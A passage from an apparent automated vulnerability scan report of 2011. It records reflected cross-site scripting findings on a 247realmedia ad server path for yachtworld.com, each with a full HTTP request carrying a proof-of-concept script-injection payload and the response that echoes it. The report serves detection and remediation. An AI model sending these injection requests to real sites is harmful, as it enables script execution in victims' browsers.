Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/


<script type="text/javascript">
//<![CDATA[
var filePath = "http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Boats/bayliner8-cruiser-yen-hp300/300-cruiser-bayliner8
...[SNIP]...
= "10";
var TFSMFlash_WMODE = "opaque";

           var TFSMFlash_OASCLICK = "http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/homepage.html621e5"-alert(1)-"dc13a113eb4/L35/1907578916/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c";
   

var TFSMFlash_SWFCLICKVARIABLE = "?clickTAG="+TFSMFlash_OASC
...[SNIP]...

1.29. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10e5e"-alert(1)-"ba9fc8796b7 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L3510e5e"-alert(1)-"ba9fc8796b7/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1725
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/


<script type="text/javascript">
//<![CDATA[
var filePath = "http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Boats/bayliner8-cruiser-yen-hp300/300-cruiser-bayliner8
...[SNIP]...
= "10";
var TFSMFlash_WMODE = "opaque";

           var TFSMFlash_OASCLICK = "http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/homepage.html/L3510e5e"-alert(1)-"ba9fc8796b7/L/1057446294/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c";
   

var TFSMFlash_SWFCLICKVARIABLE = "?clickTAG="+TFSMFlash_OASCLI
...[SNIP]...

1.30. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d2e8"><script>alert(1)</script>0d4ca12220e was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L356d2e8"><script>alert(1)</script>0d4ca12220e/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1755
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/


<script type="text/javascript">
//<![CDATA[
var filePath = "http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Boats/bayliner8-cruiser-yen-hp300/300-cruiser-bayliner8
...[SNIP]...
<IMG SRC="http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L356d2e8"><script>alert(1)</script>0d4ca12220e/L/1566023266/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

1.31. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fe69"><img%20src%3da%20onerror%3dalert(1)>f384f0f9248 was submitted in the REST URL parameter 9. This input was echoed as 2fe69"><img src=a onerror=alert(1)>f384f0f9248 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position22fe69"><img%20src%3da%20onerror%3dalert(1)>f384f0f9248/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1803
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/


<script type="text/javascript">
//<![CDATA[
var filePath = "http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Boats/bayliner8-cruiser-yen-hp300/300-cruiser-bayliner8
...[SNIP]...
<IMG SRC="http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1539632845/Position22fe69"><img src=a onerror=alert(1)>f384f0f9248/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

1.32. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 9 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd858"-alert(1)-"eb14bc423 was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2cd858"-alert(1)-"eb14bc423/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1741
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/


<script type="text/javascript">
//<![CDATA[
var filePath = "http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Boats/bayliner8-cruiser-yen-hp300/300-cruiser-bayliner8
...[SNIP]...
SMFlash_WMODE = "opaque";

           var TFSMFlash_OASCLICK = "http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/homepage.html/L35/772381933/Position2cd858"-alert(1)-"eb14bc423/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c";
   

var TFSMFlash_SWFCLICKVARIABLE = "?clickTAG="+TFSMFlash_OASCLICK + "";
var TFSMFlash
...[SNIP]...

1.33. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50145"><script>alert(1)</script>2d855ffa2ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c?50145"><script>alert(1)</script>2d855ffa2ce=1 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1708
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/


<script type="text/javascript">
//<![CDATA[
var filePath = "http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Boats/bayliner8-cruiser-yen-hp300/300-cruiser-bayliner8
...[SNIP]...
lMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/982968923/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c?_RM_EMPTY_&50145"><script>alert(1)</script>2d855ffa2ce=1" WIDTH=2 HEIGHT=2>

1.34. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41eef"><script>alert(1)</script>1be43edaacb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com41eef"><script>alert(1)</script>1be43edaacb/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 8715
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

       <script type='text/javascript'>
function expandshow_OAS_RMF_Right1() {
document.getElementById("OAS_RMF_Right1_ORG").style.display = "block" ;
document.getElementById("OAS_R
...[SNIP]...
<a href="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com41eef"><script>alert(1)</script>1be43edaacb/en/homepage.html/L35/863345634/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c" target="_blank">
...[SNIP]...

1.35. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ccd2'%3bde4122ab099 was submitted in the REST URL parameter 4. This input was echoed as 8ccd2';de4122ab099 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com8ccd2'%3bde4122ab099/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 8615
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

       <script type='text/javascript'>
function expandshow_OAS_RMF_Right1() {
document.getElementById("OAS_RMF_Right1_ORG").style.display = "block" ;
document.getElementById("OAS_R
...[SNIP]...
scr"+"ipt>";'+
   'var TFSMFlash_VERSION = "8";'+
   'var TFSMFlash_WMODE = "transparent";'+
           'var TFSMFlash_OASCLICK = "http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com8ccd2';de4122ab099/en/homepage.html/L35/739562792/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c";'+
       'var TFSMFlash_SWFCLICKVARIABLE = "?clickTAG=" + TFSMFlash_OASCLI
...[SNIP]...

1.36. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5cd36"%3b9bc0c5243fc was submitted in the REST URL parameter 4. This input was echoed as 5cd36";9bc0c5243fc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com5cd36"%3b9bc0c5243fc/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 8615
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

       <script type='text/javascript'>
function expandshow_OAS_RMF_Right1() {
document.getElementById("OAS_RMF_Right1_ORG").style.display = "block" ;
document.getElementById("OAS_R
...[SNIP]...
lash_VERSION = "8";
var TFSMFlash_WMODE = "transparent";
           var TFSMFlash_OASCLICK = "http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com5cd36";9bc0c5243fc/en/homepage.html/L35/276692936/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c";
   var TFSMFlash_SWFCLICKVARIABLE = "?clickTAG="+TFSMFlash_OASCLICK +
...[SNIP]...

1.37. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41c55"><script>alert(1)</script>1bb09f151db was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en41c55"><script>alert(1)</script>1bb09f151db/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 8715
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

       <script type='text/javascript'>
function expandshow_OAS_RMF_Right1() {
document.getElementById("OAS_RMF_Right1_ORG").style.display = "block" ;
document.getElementById("OAS_R
...[SNIP]...
<a href="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en41c55"><script>alert(1)</script>1bb09f151db/homepage.html/L35/751392265/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c" target="_blank">
...[SNIP]...

1.38. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 557d6'%3bdb31b030af8 was submitted in the REST URL parameter 5. This input was echoed as 557d6';db31b030af8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en557d6'%3bdb31b030af8/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 8615
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

       <script type='text/javascript'>
function expandshow_OAS_RMF_Right1() {
document.getElementById("OAS_RMF_Right1_ORG").style.display = "block" ;
document.getElementById("OAS_R
...[SNIP]...
"+"ipt>";'+
   'var TFSMFlash_VERSION = "8";'+
   'var TFSMFlash_WMODE = "transparent";'+
           'var TFSMFlash_OASCLICK = "http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en557d6';db31b030af8/homepage.html/L35/330912121/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c";'+
       'var TFSMFlash_SWFCLICKVARIABLE = "?clickTAG=" + TFSMFlash_OASCLICK
...[SNIP]...

1.39. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c898f"%3b20d210cd7a0 was submitted in the REST URL parameter 5. This input was echoed as c898f";20d210cd7a0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

